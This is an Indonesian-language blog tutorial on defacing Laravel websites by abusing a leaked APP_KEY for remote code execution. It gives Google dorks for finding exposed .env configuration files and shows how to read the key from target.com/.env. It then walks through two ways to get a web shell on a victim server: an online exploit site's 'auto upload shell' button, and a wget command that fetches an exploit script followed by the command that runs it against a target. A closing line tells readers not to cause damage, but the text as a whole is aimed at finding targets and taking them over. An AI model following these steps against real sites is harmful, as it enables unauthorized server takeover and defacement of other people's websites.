Deface Laravel RCE (App_key)

Baru-baru ini ramai banyak yang menyinggung cara deface menggunakan laravel RCE dimana dalam bug ini memanfaatkan APP_KEY sebagai bahan exploit nya dan kita dengan mudah bisa me-Remote server korban.

App_key ini biasanya di dapat dari file konfigurasi laravel yaitu .env ataupun dari kesalahan laravel debug. Kesalahan yang terjadi ini biasanya di manfaatkan untuk deface atau exploit pada web web laravel versi lama.

Lalu apakah semua situs laravel yang terdapat app_key nya bisa kita exploit dan kita remote ? TIDAK. Karena ada beberapa situs web yang sudah terintegrasikan dengan versi laravel yang baru dan bug ini sudah diperbaiki.

Jadi tidak perlu lama-lama lagi kita langsung saja membahas teknik cara deface laravel rce :

Dork

  • inurl:/app/config
  • inurl:/storage/
  • inurl:/vendor/
  • ext:env site:com
  • inurl:/vendor ext:env site:net
  • dll

Untuk cara dorking gunakan dork di atas dan bisa kalian rubah atau cari dork sendiri,karena yang terpenting adalah mendapatkan file konfigurasinya yaitu “.env

Kemudia setelah kalian mendapatkan target situsnya silahkan masukan /.env di belakang domain. Contoh https://target.com/.env kalau bisa nanti akan muncul file confignya.

deface laravel rce menggunakan app_key
app_key

Cara Exploit

Kemudian untuk cara explotinya terdapat dua metode yaitu menggunakan Webapp dan juga CLI. Kalian bisa memilih sesuka kalian.

Laravel RCE via WebApps

laravel rce
cara deface laravel
  1. Masuk atau kunjungi situs https://exploit.anons79.com/
  2. Kemudian masukan web target di kolom target (perhatikan penggunaan http,https,dan www)
  3. Kemudian masukan app_key web tersebut yang tadi kalian sudah dapatkan
  4. Klik auto upload shell
  5. Jika berhasil nanti akan langsung muncul url shell nya
  6. Kalau tidak vuln berarti kalian harus mencari target lain
Baca Juga :  Apa Itu Deface ? Dan Bagaimana Cara Deface Website ?

Laravel RCE via CLI

deface laravel rce
laravel rce menggunakan cli
  1. Download dan install toolsnya terlebih dahulu
wget https://raw.githubusercontent.com/wibuheker/exploit/master/php/laravel/rce.php -O lararce.php

2. Lalu jalankan tools tersebut dengan command :

php lararce.php url=http://target/ method=1

Kalian juga bisa menggunakan app_key langsung kalau kalian mau,atau menggunakan command kalian sendiri dengan perintah yang tertera pada gambar diatas.

Oke mungkin cukup sekian tutorial cara deface laravel rce menggunakan appkey. Ingat,jangan pernah merusak,artikel ini kami buat dengan tujuan menambah wawasan kita bersama.

Big thanks to kalian semua,jangan lupa untuk share artikel ini ke teman teman mu ya.

Tinggalkan Balasan